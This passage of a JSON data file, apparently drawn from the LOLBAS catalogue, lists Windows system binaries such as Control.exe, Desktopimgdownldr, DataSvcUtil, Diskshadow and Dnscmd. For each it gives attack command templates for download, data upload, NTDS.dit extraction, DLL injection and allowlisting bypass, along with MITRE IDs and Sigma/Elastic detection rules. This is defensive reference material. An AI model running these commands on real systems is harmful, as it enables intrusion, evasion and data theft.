Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:conhost-exe:0","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Use conhost.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:conhost-exe:1","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe --headless {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Specify --headless parameter to hide child process window (if applicable)","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:control-exe:0","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"control.exe {PATH_ABSOLUTE}:evil.dll","description":"Execute evil.dll which is stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:control-exe:1","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"control.exe {PATH_ABSOLUTE:.cpl}","description":"Execute .cpl file. A CPL is a DLL file with CPlApplet export function)","usecase":"Use to execute code and bypass application whitelisting","mitre":["T1218.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\control.exe","C:\\Windows\\SysWOW64\\control.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/0875c1e4c4370ab9fbf453c8160bb5abc8ad95e7/rules/windows/defense_evasion_execution_control_panel_suspicious_args.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"Control.exe executing files from alternate data streams"},{"type":"IOC","value":"Control.exe executing library file without cpl extension"},{"type":"IOC","value":"Suspicious network connections from control.exe"}],"references":["https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/","https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/","https://twitter.com/bohops/status/955659561008017409","https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items","https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/","https://lolbas-project.github.io/lolbas/Binaries/Control/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:csc-exe:0","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc.exe -out:{PATH:.exe} {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to the specified .exe path.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:csc-exe:1","toolId":"lolbas:csc-exe","toolName":"Csc.exe","name":"Compile","source":"LOLBAS","platform":["Windows"],"capability":["Compile"],"nativeCategory":["Compile"],"command":"csc -target:library {PATH:.cs}","description":"Use csc.exe to compile C# code, targeting the .NET Framework, stored in the specified .cs file and output the compiled version to a DLL file with the same name.","usecase":"Compile attacker code on system. Bypass defensive counter measures.","mitre":["T1127"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\csc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\csc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml"},{"type":"IOC","value":"Csc.exe should normally not run as System account unless it is used for development."}],"references":["https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/","https://lolbas-project.github.io/lolbas/Binaries/Csc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:cscript-exe:0","toolId":"lolbas:cscript-exe","toolName":"Cscript.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cscript //e:vbscript {PATH_ABSOLUTE}:script.vbs","description":"Use cscript.exe to exectute a Visual Basic script stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cscript.exe","C:\\Windows\\SysWOW64\\cscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml"},{"type":"BlockRule","value":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"type":"IOC","value":"Cscript.exe executing files from alternate data streams"},{"type":"IOC","value":"DotNet CLR libraries loaded into cscript.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cscript.exe.log"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Cscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:customshellhost-exe:0","toolId":"lolbas:customshellhost-exe","toolName":"CustomShellHost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"CustomShellHost.exe","description":"Executes explorer.exe (with command-line argument /NoShellRegistrationCheck) if present in the current working folder.","usecase":"Can be used to evade defensive counter-measures","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\CustomShellHost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"CustomShellHost.exe is unlikely to run on normal workstations"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml"}],"references":["https://twitter.com/YoSignals/status/1381353520088113154","https://docs.microsoft.com/en-us/windows/configuration/kiosk-shelllauncher","https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:datasvcutil-exe:0","toolId":"lolbas:datasvcutil-exe","toolName":"DataSvcUtil.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"DataSvcUtil /out:{PATH_ABSOLUTE} /uri:{REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml"},{"type":"IOC","value":"The DataSvcUtil.exe tool is installed in the .NET Framework directory."},{"type":"IOC","value":"Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil."}],"references":["https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services","https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services","https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:desktopimgdownldr-exe:0","toolId":"lolbas:desktopimgdownldr-exe","toolName":"Desktopimgdownldr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL} /eventName:desktopimgdownldr","description":"Downloads the file and sets it as the computer's lockscreen","usecase":"Download arbitrary files from a web server","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\desktopimgdownldr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml"},{"type":"IOC","value":"desktopimgdownldr.exe that creates non-image file"},{"type":"IOC","value":"Change of HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl"}],"references":["https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/","https://lolbas-project.github.io/lolbas/Binaries/Desktopimgdownldr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:devicecredentialdeployment-exe:0","toolId":"lolbas:devicecredentialdeployment-exe","toolName":"DeviceCredentialDeployment.exe","name":"Conceal","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Conceal"],"command":"DeviceCredentialDeployment","description":"Grab the console window handle and set it to hidden","usecase":"Can be used to stealthily run a console application (e.g. cmd.exe) in the background","mitre":["T1564"],"privilege":"user","fullPath":["C:\\Windows\\System32\\DeviceCredentialDeployment.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"DeviceCredentialDeployment.exe should not be run on a normal workstation"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dfsvc-exe:0","toolId":"lolbas:dfsvc-exe","toolName":"Dfsvc.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}","description":"Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)","usecase":"Use binary to bypass Application whitelisting","mitre":["T1127.002"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe","https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diantz-exe:0","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cab","description":"Compress a file (first argument) into a CAB file stored in the Alternate Data Stream (ADS) of the target file.","usecase":"Hide data compressed into an Alternate Data Stream.","mitre":["T1564.004"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diantz-exe:1","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"diantz.exe {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}","description":"Download and compress a remote file and store it in a CAB file on local machine.","usecase":"Download and compress into a cab file.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diantz-exe:2","toolId":"lolbas:diantz-exe","toolName":"Diantz.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diantz /f {PATH:.ddf}","description":"Execute diantz directives as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.","usecase":"Bypass command-line based detections","mitre":["T1036"],"privilege":"user","fullPath":["c:\\windows\\system32\\diantz.exe","c:\\windows\\syswow64\\diantz.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml"},{"type":"IOC","value":"diantz storing data into alternate data streams."},{"type":"IOC","value":"diantz getting a file from a remote machine or the internet."}],"references":["https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz","https://ss64.com/nt/makecab-directives.html","https://lolbas-project.github.io/lolbas/Binaries/Diantz/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diskshadow-exe:0","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Dump","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Dump"],"command":"diskshadow.exe /s {PATH:.txt}","description":"Execute commands using diskshadow.exe from a prepared diskshadow script.","usecase":"Use diskshadow to exfiltrate data from VSS such as NTDS.dit","mitre":["T1003.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:diskshadow-exe:1","toolId":"lolbas:diskshadow-exe","toolName":"Diskshadow.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"diskshadow> exec {PATH:.exe}","description":"Execute commands using diskshadow.exe to spawn child process","usecase":"Use diskshadow to bypass defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\diskshadow.exe","C:\\Windows\\SysWOW64\\diskshadow.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"type":"IOC","value":"Child process from diskshadow.exe"}],"references":["https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/","https://lolbas-project.github.io/lolbas/Binaries/Diskshadow/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:dnscmd-exe:0","toolId":"lolbas:dnscmd-exe","toolName":"Dnscmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}","description":"Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.","usecase":"Remotely inject dll to dns server","mitre":["T1543.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\Dnscmd.exe","C:\\Windows\\SysWOW64\\Dnscmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml"},{"type":"IOC","value":"Dnscmd.exe loading dll from UNC/arbitrary path"}],"references":["https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83","https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html","https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp","https://twitter.com/Hexacorn/status/994000792628719618","http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html","https://lolbas-project.github.io/lolbas/Binaries/Dnscmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:esentutl-exe:0","toolId":"lolbas:esentutl-exe","toolName":"Esentutl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"esentutl.exe /y {PATH_ABSOLUTE:.source.vbs} /d {PATH_ABSOLUTE:.dest.vbs} /o","description":"Copies the source VBS file to the destination VBS 